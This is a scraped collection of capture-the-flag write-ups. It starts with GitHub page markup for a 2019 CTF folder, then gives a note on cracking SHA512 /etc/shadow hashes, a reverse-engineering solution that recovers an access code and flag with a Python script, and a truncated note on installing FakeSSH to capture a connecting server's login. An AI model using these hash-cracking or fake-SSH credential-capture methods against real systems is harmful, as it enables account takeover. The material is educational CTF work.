<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/AnisBoss/CTFs/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":102334842,"originating_url":"https://github.com/AnisBoss/CTFs/tree/master/Securinets-CTF-QUALS-2019/back_to_basics","user_id":null}}" data-hydro-click-hmac="6955655b15147ffb8df9ffcd0e12ff40e6f71bea07d3c9b10dac3b06a6b58f65"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/AnisBoss/CTFs/refs" cache-key="v0:1504513197.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="QW5pc0Jvc3MvQ1RGcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/AnisBoss/CTFs/refs" cache-key="v0:1504513197.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="QW5pc0Jvc3MvQ1RGcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTFs</span></span></span><span>/</span><span><span>Securinets-CTF-QUALS-2019</span></span><span>/</span>back_to_basics<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTFs</span></span></span><span>/</span><span><span>Securinets-CTF-QUALS-2019</span></span><span>/</span>back_to_basics<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/AnisBoss/CTFs/tree-commit/535e1e5b04425e859058e8ef9450f4d76580728f/Securinets-CTF-QUALS-2019/back_to_basics" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/AnisBoss/CTFs/file-list/master/Securinets-CTF-QUALS-2019/back_to_basics"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>basic</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
This was a simple SHA512 cracking challenge, basically we had a list of users with the respective password's hash using SHA512 (notice the hashes start with `$6`, which is the code the `crypt` function uses for SHA512). Within the given hash there was the salt used, so all that remained was to make a dictionary file with all the letters, as we guessed that the cipher used to encrypt the file was a simple substitution cipher, and crack each user's hash using that dictionary.
I was reading Violent Python a few weeks ago, and the first script they have you write is a MD5 cracking script for hashes in the `/etc/shadow` file, I had already modified it for SHA512 as it was an exercise in the book, so I just used that with slight changes.
You will find the script [here](https://github.com/arty-hlr/CTF-writeups/tree/master/2019/volga/shadow_cat). |
# Reverse : Smash ```Given a Executable file : WrestleOfManiaIt asks for the acces code : Then it gives the result , code is valid or not__________________________________________________________________________ $ ./WrestleOfMania WRESTLE-O-MANIA! We bring your wrestling bets to the internet.All rights reserved, 1991.Beginning your installation.....
Please enter your access code: aaaabbbbccccddddeeeeffffggggERROR: Access code invalid.___________________________________________________________________________```### Analyzing the Executable```*checkAccessCode* is the function which is checking our input
In checkAccessCode :____________________________________________________________________________________________________ process(Input,&local_88); prepare(Input); local_10 = verify(Input,sig,(size_t)siglen,tbs,local_8c); format(Input,&stack0xffffff74); iVar1 = checkResult(local_8c); return (uint)(iVar1 == 1); }____________________________________________________________________________________________________
In the functions : (process, prepare, verify, format, checkResult)We hace to make the checkResult function to return 1:`iVar1 = checkResult(local_8c);return (uint)(iVar1 == 1);`[+] checResult function ::::____________________________________________________________________________________________________undefined4 checkResult(int param_1){ int iVar1; int *piVar2; int *piVar3; int local_88 [30]; int local_10; iVar1 = 0x1e; piVar2 = &DAT_00010de0; piVar3 = local_88; while (iVar1 != 0) { iVar1 = iVar1 + -1; *piVar3 = *piVar2; piVar2 = piVar2 + 1; piVar3 = piVar3 + 1; } local_10 = 0; while( true ) { if (0x1d < local_10) { return 1; } if (local_88[local_10] != *(int *)(param_1 + local_10 * 4)) break; local_10 = local_10 + 1; } return 0}____________________________________________________________________________________________________It is noting but Checking the Argument with the &DAT_00010de0;Equal or Not ; The Argument has to be Equal to $DAT_00010de0from `if (0x1d < local_10)` we confirm that the length is 0x1d+1 means `30`
I Have used the gdb to Extract the &DAT_00010de0 (30 values)____________________________________________________________________________________________________gdb-peda$ x/30w $edx-0x21d00x56555de0: 0x00000e60 0x000003a8 0x00001b80 0x00000f600x56555df0: 0x00000120 0x00000ea0 0x00000188 0x000003580x56555e00: 0x000001a0 0x000009a0 0x00000184 0x000004e00x56555e10: 0x00000c40 0x00000c20 0x000005a0 0x000001c80x56555e20: 0x000001d4 0x000009c0 0x000001cc 0x00000b400x56555e30: 0x00000ae0 0x00000062 0x00000360 0x000003400x56555e40: 0x000005a0 0x00000180 0x000006e0 0x00000b400x56555e50: 0x00001540 0x00000fa0____________________________________________________________________________________________________`Check_res = [0x00000e60, 0x000003a8, 0x00001b80, 0x00000f60, 0x00000120, 0x00000ea0, 0x00000188, 0x00000358, 0x000001a0, 0x000009a0, 0x00000184, 0x000004e0, 0x00000c40, 0x00000c20, 0x000005a0, 0x000001c8, 0x000001d4, 0x000009c0, 0x000001cc, 0x00000b40, 0x00000ae0, 0x00000062, 0x00000360, 0x00000340, 0x000005a0, 0x00000180, 0x000006e0, 0x00000b40, 0x00001540, 0x00000fa0]`
Now we got the local_8c ; Which came from the `format` function:format(Input,&stack0xffffff74);iVar1 = checkResult(local_8c);
[+] format function:::____________________________________________________________________________________________________void format(int Input,int *param_2){ void *__ptr; int local_10; __ptr = malloc(0x78); local_10 = 0; while (local_10 < 0x1e) { *(int *)(*param_2 + local_10 * 4) = (int)*(char *)(Input + local_10) << ((byte)*(undefined4 *)(*param_2 + local_10 * 4) & 0x1f) ; local_10 = local_10 + 1; } free(__ptr); return;}____________________________________________________________________________________________________It is nothing but Forming a string by Left shifting our Input with Argument2Param2[i] = Input[i] << Param2[i]
String[i] = Input[i] << Param2[i]
1)Through checkResukt function we came to know that the value of String should be`Check_res = [0x00000e60, 0x000003a8, 0x00001b80, 0x00000f60, 0x00000120, 0x00000ea0, 0x00000188, 0x00000358, 0x000001a0, 0x000009a0, 0x00000184, 0x000004e0, 0x00000c40, 0x00000c20, 0x000005a0, 0x000001c8, 0x000001d4, 0x000009c0, 0x000001cc, 0x00000b40, 0x00000ae0, 0x00000062, 0x00000360, 0x00000340, 0x000005a0, 0x00000180, 0x000006e0, 0x00000b40, 0x00001540, 0x00000fa0]`2)I have extracted the Param2 values using gdb____________________________________________________________________________________________________gdb-peda$ x/w 0x565599800x56559980: U"\005\003\006\005\002\005\003\003\003\005\002\004\006\005\005\002\002\005\002\006\005\001\003\004\005\003\004\006\006\005"____________________________________________________________________________________________________
Now we have String , Param2 Then :Input[i] = String[i] >> Param2```
```pyParam2 = "\005\003\006\005\002\005\003\003\003\005\002\004\006\005\005\002\002\005\002\006\005\001\003\004\005\003\004\006\006\005"Param2 = [ord(x) for x in Param2]Input = ['*']*30Check_res = [0x00000e60, 0x000003a8, 0x00001b80, 0x00000f60, 0x00000120, 0x00000ea0, 0x00000188, 0x00000358, 0x000001a0, 0x000009a0, 0x00000184, 0x000004e0, 0x00000c40, 0x00000c20, 0x000005a0, 0x000001c8, 0x000001d4, 0x000009c0, 0x000001cc, 0x00000b40, 0x00000ae0, 0x00000062, 0x00000360, 0x00000340, 0x000005a0, 0x00000180, 0x000006e0, 0x00000b40, 0x00001540, 0x00000fa0]
for i in range(30): Input[i] = Check_res[i] >> Param2[i]print(''.join([chr(x) for x in Input]))```### Output ```$ py exp.py sun{Hu1k4MaN1a-ruNs-W1l4-0n-U}```
# flag : `sun{Hu1k4MaN1a-ruNs-W1l4-0n-U}` |
# Knockknock
It was not about attacking, but listening on the laptop.There was a connection to port 22 from the server 10.13.37.99Let's install a FakeSSH serveur :git clone https://github.com/tylermenezes/FakeSSH
sudo pip install paramiko
